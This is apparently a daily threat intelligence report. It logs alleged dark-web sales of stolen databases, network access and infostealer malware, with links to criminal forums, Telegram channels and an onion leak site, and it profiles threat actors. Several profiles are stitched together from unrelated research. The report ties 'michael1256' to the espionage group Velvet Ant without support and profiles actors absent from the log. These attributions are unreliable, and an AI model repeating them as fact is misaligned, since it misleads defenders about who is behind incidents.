I. Executive Summary
The past 24 hours have highlighted a dynamic and increasingly sophisticated cybersecurity landscape, characterized by a confluence of financially motivated cybercrime and state-sponsored operations. Analysis of recent incidents reveals a persistent focus on data exfiltration for extortion, the exploitation of critical infrastructure, and the innovative misuse of legitimate tools and system misconfigurations by adversaries. A significant trend emerging from these activities is the blurring of traditional distinctions between threat actor motivations and capabilities. Financially driven groups are now frequently employing advanced evasion techniques, such as abusing legitimate software and signed drivers, which were once primarily associated with nation-state actors.1 Conversely, some state-sponsored operations, while focused on espionage, also engage in activities that result in financial gain, such as cyber-facilitated cargo theft.2 This convergence means that organizations can no longer assume that advanced persistent threat (APT) capabilities are exclusive to state-backed entities. Defensive strategies must therefore be robust and comprehensive, designed to counter a wide spectrum of sophisticated threats regardless of their primary objective. This report details specific incidents, profiles the associated threat actors, and discusses the broader implications for cybersecurity posture.
II. Daily Incident Log
This section provides a summary of cybersecurity incidents reported within the last 24 hours, offering a concise overview of the affected entities, the nature of the breaches, and the identified threat actors. For each incident, direct links to published reports and supporting screenshots are provided for verification and deeper investigation.
Incident: Alleged sale of UAE Private Business Database
- Category: Data Breach
- Date: 2025-07-08T14:04:12Z
- Threat Actor(s): PhycoX
- Content: Threat actor claims to have obtained the database allegedly containing a comprehensive list of 1 million UAE professionals, featuring contact details such as PO Box numbers, UAE landline numbers (+971), names and job titles, email addresses, company or personal names, fax numbers, websites, and detailed company information.
- Published URL: https://darkforums.st/Thread-Selling-UAE-Private-Business-Database-%E2%80%93-1-Million-Verified-Contacts-with-Email
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3afd6395-71ee-421c-865e-3150330e42fb.png
Incident: Alleged database sale of Skillbee
- Category: Data Breach
- Date: 2025-07-08T13:11:24Z
- Threat Actor(s): michael1256
- Victim Organization: skillbee
- Victim Country: India
- Victim Industry: Staffing/Recruiting
- Victim Site: skillbee.com
- Content: Threat actor claims to be selling a database containing 635K contacts allegedly from Skillbee in the United Arab Emirates. The compromised data includes ID, name, country code, phone number, nationality, and salary details of the individuals.
- Published URL: https://darkforums.st/Thread-Selling-Skillbee-com-database-of-United-Arab-Emirates
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3a82f292-cb9a-49cd-ac89-6e1d391844d6.png
Incident: Alleged sale of Zoom Private SI Kit Loader
- Category: Malware
- Date: 2025-07-08T13:03:52Z
- Threat Actor(s): anongod
- Content: The threat actor is selling a Zoom Private SI Kit loader, designed for social engineering operations. The kit includes a spoofed Zoom page and a manual containing commands and instructions to deliver payloads from a remote server directly to a target machine. The method is customizable based on operational needs.
- Published URL: https://ramp4u.io/threads/zoom-private-si-kit-loader.3261/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7afeea0b-1123-41f6-af0c-c33684b64f7c.png
Incident: Alleged data breach of Helwan University
- Category: Data Breach
- Date: 2025-07-08T12:52:24Z
- Threat Actor(s): namolesa
- Victim Organization: helwan university
- Victim Country: Egypt
- Victim Industry: Higher Education/Academia
- Victim Site: helwan.edu.eg
- Content: Threat actor claims to have obtained the database containing 20K Records. Compromised data allegedly includes first name, last name, third name, phone, email, Specialization, StudentID, personId.
- Published URL: https://darkforums.st/Thread-%F0%9F%87%AA%F0%9F%87%AC-Egypt-University-Full-Student-%E2%80%93-20K-Records-CSV-2025
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3348e94d-ad99-42ac-a850-a73d13c1a4c3.png
Incident: Alleged Sale of EDRs and USA Government Data
- Category: Initial Access
- Date: 2025-07-08T12:05:54Z
- Threat Actor(s): caeer
- Content: Threat actor claims to be selling EDR access and U.S. government data packages, along with regular government records from countries such as Argentina, Brazil, and Zambia. The offering also includes premium bundles featuring social media subpoenas, forged documents, and high-value subpoenas for platforms like Instagram, Facebook, Telegram, and Gmail.
- Published URL: https://kittyforums.to/thread/575
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/106a87b9-61c5-4caf-91f2-cb0c905c40d2.png
Incident: Alleged access to Saudi Ministry of Justice
- Category: Initial Access
- Date: 2025-07-08T11:47:27Z
- Threat Actor(s): eksta
- Victim Organization: saudi ministry of justice
- Victim Country: Saudi Arabia
- Victim Industry: Government Administration
- Victim Site: moj.gov.sa
- Content: The threat actor claims to have accessed the SSL-VPN portal of the Saudi Ministry of Justice.
- Published URL: https://darkforums.st/Thread-Saudi-Ministry-of-Justice-https-www-moj-gov-sa
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7dbff052-0f01-4896-991d-d559de475c3a.png
Incident: Alleged sale of UBC — Access mining infrastructure
- Category: Malware
- Date: 2025-07-08T11:40:19Z
- Threat Actor(s): clockwork_orange
- Content: Threat actor is selling UBC, a distributed brute-force platform featuring unlimited scaling with thousands of workers, real-time monitoring and control, API integration for custom scripts, VPN support at the worker level, and efficient authorization group parsing.
- Published URL: https://ramp4u.io/threads/%F0%9F%A7%AA-ubc-%E2%80%94-%D0%98%D0%BD%D1%84%D1%80%D0%B0%D1%81%D1%82%D1%80%D1%83%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%B4%D0%BB%D1%8F-%D0%B4%D0%BE%D0%B1%D1%8B%D1%87%D0%B8-%D0%B4%D0%BE%D1%81%D1%82%D1%83%D0%BF%D0%BE%D0%B2-%D0%BA%D0%B0%D1%81%D1%82%D0%BE%D0%BC%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F-api-%D0%BC%D0%B0%D1%81%D1%88%D1%82%D0%B0%D0%B1-%D0%B1%D0%B5%D0%B7-%D0%B3%D1%80%D0%B0%D0%BD%D0%B8%D1%86.3260/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/895334f4-915e-4380-9478-6e9acd1494eb.png
Incident: Team insane Pakistan targets the website of Banaras Hindu University (BHU)
- Category: Defacement
- Date: 2025-07-08T10:56:14Z
- Threat Actor(s): Team insane Pakistan
- Victim Organization: banaras hindu university (bhu)
- Victim Country: India
- Victim Industry: Education
- Victim Site: bhu.ac.in
- Content: The group claims to have defaced the website of Banaras Hindu University (BHU).
- Published URL: https://t.me/xo1337ox/7
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/83cc80e1-f6ad-4966-83e5-dd2a5c5f548b.png
Incident: Alleged data breach of Albiko Furniture
- Category: Data Breach
- Date: 2025-07-08T10:50:55Z
- Threat Actor(s): Perun Svaroga
- Victim Organization: albiko furniture
- Victim Country: Poland
- Victim Industry: Furniture
- Victim Site: albiko.pl
- Content: The group claims to have leaked the database of Albiko Furniture, which contains full names, email addresses, physical addresses, logins, and passwords.
- Published URL: https://t.me/perunswaroga/256
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d9564a15-6ed8-4441-8512-84cc701067cc.png
Incident: Alleged data breach of Evolution Academy
- Category: Data Breach
- Date: 2025-07-08T10:42:57Z
- Threat Actor(s): Himenisme666
- Victim Organization: evolution academy
- Victim Country: Italy
- Victim Industry: Education
- Victim Site: evolutionacademy.eu
- Content: The threat actor claims to have leaked the database of Evolution Academy containing names and email addresses.
- Published URL: https://darkforums.st/Thread-Document-Evolution-Academy-Italia
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/1ca12950-11c2-4288-b4ae-22b0164a7a6c.png
Incident: Alleged data breach of Cherkasy State Business-College
- Category: Data Breach
- Date: 2025-07-08T10:35:42Z
- Threat Actor(s): wh6ami
- Victim Organization: cherkasy state business college
- Victim Country: Ukraine
- Victim Industry: Education
- Victim Site: csbc.edu.ua
- Content: Threat actor claims to have obtained a database dump containing 31 tables.
- Published URL: https://leakbase.la/threads/csbc-edu-ua-cherkasy-state-business-college-ua.40162/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/71d97a7d-3e69-45dd-b8b4-a69d08b73d1.png
Incident: Alleged data breach of Ukraine Kremenchuk Mykhailo Ostrohradskyi University
- Category: Data Breach
- Date: 2025-07-08T10:24:28Z
- Threat Actor(s): wh6ami
- Victim Organization: ukraine kremenchuk mykhailo ostrohradskyi university
- Victim Country: Ukraine
- Victim Industry: Higher Education/Academia
- Victim Site: kdu.edu.ua
- Content: Threat actor claims to have obtained a database dump containing 55 tables with sensitive information, including biographies, email addresses, and other personal data.
- Published URL: https://leakbase.la/threads/kdu-edu-ua-national-university-krnu-in-ukraine.40161/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/50097306-4b76-4ec8-bc9d-1efe324cc2f9.png
Incident: Alleged data sale of an Unidentified jewelry Shop
- Category: Data Breach
- Date: 2025-07-08T09:35:24Z
- Threat Actor(s): jaba1234
- Victim Industry: Luxury Goods & Jewelry
- Content: The threat actor claims to be selling user data from a jewelry store.
- Published URL: https://xss.is/threads/141492/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/4e2aa823-28ec-4975-ac6f-1fb11e4f1212.png
Incident: Alleged data breach of Rosenkranz Scherer GmbH
- Category: Data Breach
- Date: 2025-07-08T08:56:22Z
- Threat Actor(s): Worldleaks
- Victim Organization: rosenkranz scherer gmbh
- Victim Country: Germany
- Victim Industry: Healthcare & Pharmaceuticals
- Victim Site: scherer-portal.de
- Content: The group claims to have obtained data from the organization.
- Published URL: https://worldleaksartrjm3c6vasllvgacbi5u3mgzkluehrzhk2jz4taufuid.onion/companies/3871108697/overview
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/b23a8ac5-3f9c-4b7c-bdb8-c2014e97e3cf.png
Incident: Alleged data leak of French Property
- Category: Data Leak
- Date: 2025-07-08T08:35:10Z
- Threat Actor(s): DigitalGhost
- Victim Organization: french property
- Victim Country: UK
- Victim Industry: Real Estate
- Victim Site: french-property.com
- Content: Threat actor claims to have obtained 500K records from the organization. Compromised data includes full names, home addresses, email addresses, phone numbers, and financial details.
- Published URL: https://darkforums.st/Thread-500K-FRENCH-PROPERTY-COM
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/fc8fb0c4-7685-4afe-9b5d-3cd36b448d79.png
Incident: Alleged data leak of Trustpilot
- Category: Data Leak
- Date: 2025-07-08T08:27:41Z
- Threat Actor(s): DigitalGhost
- Victim Organization: trustpilot
- Victim Country: Denmark
- Victim Industry: Information Technology (IT) Services
- Victim Site: trustpilot.com
- Content: A threat actor claims to have leaked 800K records of the organization’s data. Compromised data allegedly includes full names, street addresses, phone numbers, email addresses, and payment details.
- Published URL: https://darkforums.st/Thread-800K-TRUSTPILOT-COM
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/e43f9c69-6a07-4ccc-a096-e00d817513a7.png
Incident: Alleged data breach of Iran International
- Category: Data Breach
- Date: 2025-07-08T08:13:16Z
- Threat Actor(s): Handala Hack
- Victim Organization: iran international
- Victim Country: Iran
- Victim Industry: Broadcast Media
- Victim Site: iranintl.com
- Content: A group claims to have hacked Iran International, gaining access to internal systems, emails, staff details, and financial records. They mentioned that a full data release will happen soon as part of a larger operation.
- Published URL: https://t.me/handala_hack27/107
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3488ec60-332b-481b-9e8b-646bff20bc92.png
Incident: Alleged sale of personal data from USA
- Category: Data Leak
- Date: 2025-07-08T07:55:26Z
- Threat Actor(s): G_mic
- Victim Country: USA
- Content: Threat actor claims to be selling personal data from USA. The compromised data reportedly contains 15.5 million records, including full names, addresses, cities, states, ZIP codes, phone numbers, gender, income details, dates of birth, Social Security numbers, and driver’s license numbers.
- Published URL: https://darkforums.st/Thread-USA-RICH-DB
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/368f9285-15f4-4aa3-a1ba-6f47efcba0b6.png
Incident: Alleged sale of mail:pass corporate data
- Category: Data Leak
- Date: 2025-07-08T07:35:29Z
- Threat Actor(s): driver001
- Content: The threat actor is offering to sell 200 GB of email and password combinations belonging to corporate accounts primarily from the US and Europe.
- Published URL: https://xss.is/threads/141486/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7be12b8d-64a1-4975-a749-cf6ee35d8afe.png
Incident: Alleged data breach of Al Azhar Kalibanteng
- Category: Data Breach
- Date: 2025-07-08T07:20:05Z
- Threat Actor(s): gesss
- Victim Organization: al azhar kalibanteng
- Victim Country: Indonesia
- Victim Industry: Education
- Victim Site: inventory.alazharkalibanteng.or.id
- Content: The threat actor claims to have obtained the organization’s database containing 5,000 records.
- Published URL: https://darkforums.st/Thread-LEAKED-INDONESIAN-INVENTORY-ALAZHARKALIBANTENG-OR-ID
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/5e79c9a0-c99a-4738-935d-923cdf1c43fe.png
Incident: Alleged data sale of Forex & Crypto Depositor databases
- Category: Data Leak
- Date: 2025-07-08T06:35:21Z
- Threat Actor(s): BreachX
- Victim Country: Russia
- Content: Threat actor claims to be selling Forex and crypto leads from Russia, Belgium, and Denmark, totaling 281,183 records. The compromised data reportedly includes email, customer ID, phone number, sale status, account status, country, lead type, and other related details.
- Published URL: https://darkforums.st/Thread-Selling-Russia-Belgium-Denmark-Forex-Crypto-Depositor-Recovery-Leads-Available
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/12a90b30-cdf3-4667-ad1a-db2e96c71524.png
Incident: Alleged Sale of Unauthorized Access to Superior Audit Office of the State of Nayarit
- Category: Initial Access
- Date: 2025-07-08T05:41:45Z
- Threat Actor(s): Ranssi
- Victim Organization: superior audit office of the state of nayarit
- Victim Country: Mexico
- Victim Industry: Government Administration
- Victim Site: asen.gob.mx
- Content: A threat actor has allegedly gained and is offering unauthorized access to the web administration panel of the Superior Audit Office of Nayarit, Mexico (asen.gob.mx).
- Published URL: https://darkforums.st/Thread-Administrator-Access-to-asen-gob-mx
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/5511ab02-9955-417d-8f83-d573e2817d37.png, https://d34iuop8pidsy8.cloudfront.net/c3a691fa-7127-44d9-94a7-22ac95513665.png
Incident: Alleged sale of the AURA Stealer
- Category: Malware
- Date: 2025-07-08T04:09:52Z
- Threat Actor(s): AuraCorp
- Content: The threat actor is offering to sell a malware product called AURA Stealer, a sophisticated malware designed to steal data from over 110 browsers, 70+ applications (including wallets and 2FA), and 250+ browser extensions. It operates stealthily using advanced obfuscation, anti-debugging, and encrypted communications. The malware includes a user-friendly control panel for easy customization, excludes targets in CIS countries, and aims to harvest sensitive information such as credentials and cookies.
- Published URL: https://xss.is/threads/141472/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/97e17dc1-75e1-4fea-872b-c9f056452b99.png, https://d34iuop8pidsy8.cloudfront.net/f37efa83-fea1-4ffc-8ca1-f63bd0660557.png, https://d34iuop8pidsy8.cloudfront.net/154055af-95bd-4c2c-b175-374721b07695.png, https://d34iuop8pidsy8.cloudfront.net/214f74a5-e82f-4894-9a44-c8e2c60d597e.png, https://d34iuop8pidsy8.cloudfront.net/fa40a581-4ecd-4362-ab16-c77341aacd6a.png, https://d34iuop8pidsy8.cloudfront.net/8836ffee-7717-4858-878b-3f09a41b6e2c.png, https://d34iuop8pidsy8.cloudfront.net/026c2723-b3d0-4f83-a40b-3e47d0551fd9.png, https://d34iuop8pidsy8.cloudfront.net/26ad6c6c-7fa9-4edb-aa32-aad432291d69.png
Incident: Alleged leak of SSN data in US
- Category: Data Leak
- Date: 2025-07-08T03:33:57Z
- Threat Actor(s): Wisetony
- Victim Country: USA
- Victim Industry: Banking & Mortgage
- Content: The threat actor claims to have leaked data from the US. The compromised data reportedly includes reports, bank statements, credit card logins, bank logs, and similar material.
- Published URL: https://darkforums.st/Thread-USA-Bank%E2%9C%85SSN-Fullz-DL%E2%9C%85Dumps%E2%9C%85High-Balance-Cc%E2%9C%85Cash-App-Logs%E2%9C%85PayPal-Logs-Available
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/56ff2269-a6e9-4eab-a7b8-784a6404a18f.png
Incident: Alleged data leak of Israeli systems
- Category: Data Leak
- Date: 2025-07-08T02:38:23Z
- Threat Actor(s): Wearerootsec
- Victim Country: Israel
- Content: The group claims to have gained access to Israeli computer systems and extracted several databases. The compromised data reportedly includes usernames, email addresses, and passwords obtained from Israeli servers.
- Published URL: https://t.me/c/2299905742/677
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/38003a2f-9764-4330-8482-471d02c3d32b.png, https://d34iuop8pidsy8.cloudfront.net/21a83e5f-f81e-437d-b40c-74b1f27d1402.png, https://d34iuop8pidsy8.cloudfront.net/20139ba8-e896-4080-9412-6e9e7ef44055.png
Incident: Alleged Sale of Unauthorized Access to Euskal Herria Bildu
- Category: Initial Access
- Date: 2025-07-08T01:23:36Z
- Threat Actor(s): Cargo
- Victim Organization: euskal herria bildu
- Victim Country: Spain
- Victim Industry: Political Organization
- Victim Site: ehbildu.eus
- Content: A threat actor has allegedly gained and offered unauthorized access to the private email system of EH Bildu, a left-wing Basque nationalist political party in Spain. This compromise could be exploited for various malicious purposes, including phishing attacks, social engineering, spreading misinformation, obtaining sensitive information, conducting targeted scams, and enabling further cyberattacks.
- Published URL: https://darkforums.st/Thread-Selling-SPAIN-EHBILDU-POLITICAL-PARTY-EMAIL-SYSTEM-ACCESS–16511
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/27ec2673-86aa-42ba-b5dd-eeff5ba02663.png
III. In-Depth Threat Actor Profiles
This section provides detailed profiles of the threat actors identified in today’s incidents, offering context on their operations, motivations, and technical approaches.
Threat Actor: Phorpiex Operators
Phorpiex is not a singular threat actor but rather a well-established botnet malware, recognized as one of the leading cyber threats since at least 2021.4 The operators behind the Phorpiex botnet are primarily driven by financial gain, employing a diverse range of monetization strategies. They engage in extortion, notably through sextortion scams where infected systems send spam emails threatening to release compromising videos.4 Cryptojacking is another significant revenue stream, leveraging the computational power of compromised machines to mine cryptocurrency on the attackers’ behalf, sometimes using cryptocurrency clipper malware to redirect payments.4 Furthermore, the botnet is utilized for malware delivery, acting as a platform to distribute various malicious payloads, including ransomware, cryptomining tools, spambots, and infostealers. This allows operators to sell access to compromised systems or launch direct ransomware attacks, extorting ransoms for data restoration.4
Initial infection typically begins with the delivery of a dropper, which can be distributed through multiple vectors. These include infected USB drives, phishing via instant messaging and emails, being dropped by other malware or unwanted programs, and downloads from deceptive sites masquerading as legitimate software providers.4 The botnet also incorporates worm modules for self-spreading, enhancing its reach.4 Phorpiex has been observed to operate even without an active command-and-control (C2) server, indicating a degree of resilience in its design.5 Recent campaigns have specifically targeted entities within the finance sector across Europe and North America, utilizing shortcut files with embedded malicious macros to infect systems and download additional malware.5 The versatility of Phorpiex in delivering various malware types makes it a persistent and dangerous threat, as a single infection can open the door for multiple attackers to gain access and deploy different forms of malicious software.4
Further Reading:
- https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/phorpiex-malware/ 4
- https://www.broadcom.com/support/security-center/protection-bulletin/phorpiex-malware-campaign-targets-finance-sector-in-europe-and-north-america 5
Threat Actor: Pryx
Pryx is a notable threat actor who has recently escalated their activities within the cybercrime community. Operating under aliases such as “HolyPryx” and “Sp1d3r” (distinct from another actor using similar names), Pryx claims to be 17 years old and has been primarily active on the XSS cybercrime forum since June 2024, with occasional presence on BreachForums.6 This actor is recognized for their involvement in malware and ransomware development, as well as identity access brokering.6
Pryx has made significant contributions, particularly through their write-ups on server-side information stealers and silent Tor servers, demonstrating a technical proficiency in developing novel malware.6 A major development in their recent history is the formation of a new ransomware group named Hellcat, which has already claimed four victims on its data leak site.6 Pryx is also connected to a network of prominent collaborators, including IntelBroker and members of the “Five Families” hacking alliance, indicating a well-established position within the cybercrime ecosystem.6 The primary motivation behind Pryx’s activities appears to be financial gain, derived from ransomware operations and the sale of access and malware.
Further Reading:
Threat Actor: Velvet Ant (Associated with “michael1256” context)
While the query might refer to “michael1256” 7, research attributes the associated activity to a sophisticated actor tracked as “Velvet Ant” by cybersecurity firm Sygnia.8 Velvet Ant is suspected to be a China-nexus cyber espionage actor, demonstrating robust capabilities to adapt and pivot their tactics rapidly in response to defensive measures.8
This group has been responsible for a prolonged attack, lasting approximately three years, against an unnamed organization located in East Asia.8 Their primary motivation is cyber espionage, focusing on the collection of sensitive information, particularly customer and financial data.8 Velvet Ant’s tactics involve establishing persistence using legacy F5 BIG-IP appliances, which they then repurpose as internal command-and-control (C&C) infrastructure for defense evasion.8 They frequently deploy PlugX (also known as Korplug), a modular remote access Trojan (RAT) widely used by Chinese espionage operators. PlugX infections often rely on DLL side-loading techniques.8 To further evade detection, Velvet Ant has been observed attempting to disable endpoint security software before installing PlugX. For lateral movement within compromised networks, they leverage open-source tools like Impacket.8 A particularly advanced tactic involves deploying two versions of PlugX: one configured with an external C&C server for exfiltrating sensitive data from internet-connected endpoints, and another without C&C configuration, deployed exclusively on legacy systems to blend malicious traffic with legitimate internal network activity.8 This dual deployment strategy underscores their sophisticated approach to maintaining covert operations over extended periods.
Further Reading:
Threat Actor: anongod
The threat actor known as “anongod” is active on deep web hacking forums like RAMP, having joined in 2023.9 This actor has a mixed reputation within these communities, suggesting a combination of legitimate and perhaps dubious offerings.9 anongod is associated with the Bl00dy Ransomware Gang, indicating potential involvement in ransomware-related activities.10
anongod’s primary motivation is financial gain, achieved through various means. In 2024, the actor advertised databases purportedly stolen from police departments in South American nations, as well as a significant 9-gigabyte data breach allegedly from the California Secretary of State.9 A notable instance of their activity occurred on January 5, 2025, when anongod advertised a zero-day vulnerability allegedly targeting the Solana Blockchain platform for USD 150,000.9 This advertisement, however, was met with skepticism by forum users due to the relatively low asking price, the omission of escrow services, and the lack of proof-of-concept, leading to questions about its legitimacy.9 This situation illustrates a common challenge in the underground economy: verifying the authenticity of claimed vulnerabilities and stolen data. The actor’s willingness to advertise such a lucrative vulnerability for sale, rather than exploit it themselves for potentially greater revenue, also raised questions about their technical expertise or risk assessment.9 anongod’s tactics primarily involve data brokerage and the sale of alleged zero-day vulnerabilities, leveraging deep web forums as their marketplace. Their targeting profile includes law enforcement and government entities for data breaches, and blockchain platforms for vulnerability sales.9
Further Reading:
- https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-1/ 9
- https://www.watchguard.com/br/wgrd-ransomware/bl00dy 10
Threat Actor: (Clarification for “namolesa”)
The term “namolesa” does not correspond to a specific malicious threat actor in the available research. Instead, the provided information discusses general aspects of threat actor naming conventions and the importance of focusing on technical details over nicknames.11 For instance, cybersecurity vendors use different naming methodologies for threat actors, such as CrowdStrike’s adjective-animal convention or Mandiant’s three-letter acronyms.12 This variety underscores why security teams should prioritize concrete indicators, tactics, techniques, and procedures (TTPs), and contextual information relevant to their technology stack, geography, or industry, rather than relying solely on a threat actor’s moniker.12 Effective threat intelligence workflows are enhanced by naming normalization, but the core value lies in understanding how an adversary operates, not just what they are called.12
Further Reading:
- https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-11/ 11
- https://www.forrester.com/blogs/decoding-the-naming-game-why-standardizing-threat-actor-names-alone-wont-enhance-your-security-posture-or-response/ 12
- https://en.wikipedia.org/wiki/Anonymous_(hacker_group 13
- https://threatcop.com/blog/nobelium-solarwind-hackers/ 14
Threat Actor: (Clarification for “caeer”)
The term “caeer” does not refer to a specific malicious threat actor in the provided research. Instead, the snippets associated with this term describe legitimate organizations focused on career development, such as “Career Hackers” and “The Job Hackers”.15 This highlights a potential misidentification in the query.
To provide relevant context, it is important to understand the broader landscape of threat actors. A threat actor is any individual or group that intentionally causes harm in the digital realm by exploiting vulnerabilities in computers, networks, or systems.17 This broad definition encompasses various types, each with distinct motivations and methods. These include financially motivated cybercriminals who seek monetary gain through data theft or ransomware; nation-state actors, often government-backed, focused on espionage, disinformation, or disrupting critical infrastructure; hacktivists driven by political or ideological agendas; insiders who exploit their legitimate access; and “script kiddies” who use pre-existing tools without deep technical skills.17 Understanding these categories is crucial for developing effective detection methods and incident response strategies, as the motivations and resources behind an attack dictate its nature and persistence.18
Further Reading:
- https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/ 17
- https://www.proofpoint.com/us/threat-reference/threat-actor 18
- https://careerhackers.io/pro/about-us 15
- https://www.thejobhackers.org/ 16
Threat Actor: (Clarification for “eksta”)
The term “eksta” does not correspond to a specific malicious threat actor in the provided research. “Trojan:Win32/Ekstak” refers to a type of malware detected by Microsoft Defender Antivirus, capable of performing various malicious actions on a device.19 This indicates that “eksta” likely refers to malware rather than an actor.
However, the research provides valuable context on how various threat actors exploit corporate vulnerabilities. Threat actors are consistently engaged in infiltrating corporate assets, extracting valuable information, and distributing it on cybercrime forums for trade.20 Their initial access vectors are diverse, encompassing the exploitation of software vulnerabilities (such as SQL injection, API vulnerabilities, and misconfigurations), the deployment of malware, phishing attacks, and the leveraging of compromised credentials.20 Notable examples include the 2012 Yahoo breach via SQL injection, the 2023 Twitter data scrape exploiting API vulnerabilities, and the compromise of a Brazilian supermarket through a misconfigured Amazon S3 bucket.20 Supply chain attacks are also prevalent, as seen with the University of California breach facilitated by a vulnerability in a third-party provider’s software.20 The focus on stealing or obtaining login credentials for database services, often through attacks or purchases on cybercrime markets, underscores the importance of robust access controls.20
Further Reading:
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Ekstak&ThreatID=2147735572 19
- https://www.kelacyber.com/blog/revealing-corporate-vulnerabilities-understanding-how-threat-actors-breach-and-exploit-your-data/ 20
- https://en.wikipedia.org/wiki/Equation_Group 21
- https://en.wikipedia.org/wiki/Ghost_Squad_Hackers 22
Threat Actor: (Clarification for “clockwork_orange”)
The term “clockwork_orange” does not refer to a specific malicious threat actor in the provided research. The snippets associated with this term refer to fictional hacker groups (like “fsociety” from “Mr. Robot” 23), general definitions of threat actors 24, or details about unrelated groups like UNC3944 and Rey (linked to HellCat ransomware).25
However, the information provides important context on how threat actors operate and adapt. For instance, the decline in activity from UNC3944, also known as Scattered Spider, following law enforcement actions in 2024 demonstrates the effectiveness of counter-cybercrime efforts.25 This group, a financially motivated threat actor, is known for its persistent use of social engineering and targeting of organizations with large quantities of personally identifiable information (PII) and financial data.25 Despite law enforcement disruption, it is common for threat actors to temporarily pause or scale back operations to reduce scrutiny, rebuild capabilities, or adopt new tools to evade detection.25 This highlights that while law enforcement is crucial, it rarely signifies a definitive end to an actor’s activities; organizations must anticipate re-emergence or shifts in tactics.
Another relevant actor mentioned is “Rey,” who is affiliated with the HellCat ransomware group.26 Rey claimed responsibility for a cyberattack on Orange Group’s Romanian operations, where access was obtained through compromised credentials and vulnerabilities in Jira, an issue-tracking software.26 The attacker maintained access for over a month and exfiltrated approximately 380,000 unique email addresses, internal company documents, and customer information during a three-hour operation.26 An extortion attempt failed, leading to the data being leaked on a hacker forum.26 This illustrates how individual actors, even if affiliated with larger groups, can conduct independent operations, often leveraging common vulnerabilities and focusing on data exfiltration for direct financial pressure.
Further Reading:
- https://en.wikipedia.org/wiki/Threat_actor 24
- https://industrialcyber.co/ransomware/mandiant-links-dragonforce-ransomware-attacks-on-uk-retailers-to-unc3944-tactics-highlighting-links-to-ransomhub/ 25
- https://en.wikipedia.org/wiki/Mr._Robot 23
- https://www.techmonitor.ai/technology/cybersecurity/orange-group-investigates-cyberattack-hacker-compromised-data 26
Threat Actor: Team Insane PK
Team Insane PK is a prominent religious “hacktivist” organization, allegedly based out of Pakistan, that has gained notoriety for its cyberattacks, primarily targeting Indian government and business websites since early 2023.27 Their activities are driven by religious ideologies, aiming to promote a specific belief system or discredit others, often in retaliation for cyber warfare involving Indian, Pakistani, and Malaysian hacktivist teams.27 The group has been active since at least July 2022 (Twitter) and October 2022 (Telegram), and its reputation is rated as “Medium”.28
Their primary tactic involves Distributed Denial of Service (DDoS) attacks, where they overwhelm a network with traffic to render it inaccessible, effectively clogging bandwidth by flooding servers with data packets.27 Team Insane PK also claims responsibility for data leaks from targeted Indian businesses.27 Their attacks frequently feature religiously motivated messages.27 To provide proof of their successful DDoS attacks, the group shares evidence via Telegram posts, often including links to check-host.net, a web utility that provides real-time information on domain availability and responsiveness.28 This practice of public validation highlights the importance of reputation building within hacktivist communities, even if the operational impact is temporary.
Notable campaigns include the “#OpIndia Campaign” on the eve of the 2023 G20 Summit in India, during which they launched approximately 2,450 targeted cyberattacks, with over 50% being DDoS attacks. These operations targeted diverse sectors, including government digital infrastructure, non-profit organizations, the finance and banking sector, and the energy and oil industry.27 As part of these operations, they temporarily disrupted the Delhi and Mumbai Police websites, causing significant disruption to crucial government infrastructure.27 Team Insane PK has also targeted various Indian businesses, including educational institutes, telecommunications companies, manufacturing firms, and national archives, claiming to have leaked sensitive data during these incidents.27 The group’s continued targeting of Indian and Iranian entities under hashtags like #OpIran and #OpIndia underscores a persistent, ideologically driven engagement in cyber warfare.28
Further Reading:
- https://www.radware.com/cyberpedia/ddos-attacks/hacktivist-group-team-insane-pk/ 27
- https://www.cloudsek.com/threatintelligence/team-insane-pk-claims-ddos-attack-on-44-indian-banking-and-finance-websites 28
Threat Actor: (Clarification for “wh6ami”)
The term “wh6ami” does not refer to a specific malicious threat actor in the provided research. One snippet is a general video about threat actors and Google Threat Intelligence.29 Other snippets list various well-known hacker groups, offering a broader perspective on the diverse landscape of cyber adversaries.30
The cyber threat landscape is populated by a wide array of groups, each with distinct motivations and capabilities. These include:
- Hacktivists: Groups like Anonymous, a decentralized collective known for anti-censorship and anti-surveillance activism, often operating for political reasons or “for the lulz”.30 The Chaos Computer Club (CCC) is another example, focusing on ethical hacking, exposing vulnerabilities, and advocating for digital rights.31
- Nation-State Actors: These are often government-backed, highly sophisticated groups like the Lazarus Group (North Korea), known for financial theft and espionage, or Fancy Bear (Russia), focused on cyberespionage.30 The Equation Group, suspected to be tied to the US NSA, is considered one of the most advanced persistent threats, utilizing zero-day exploits.30 The NSA’s own elite team, Tailored Access Operations (TAO), also falls into this category.31
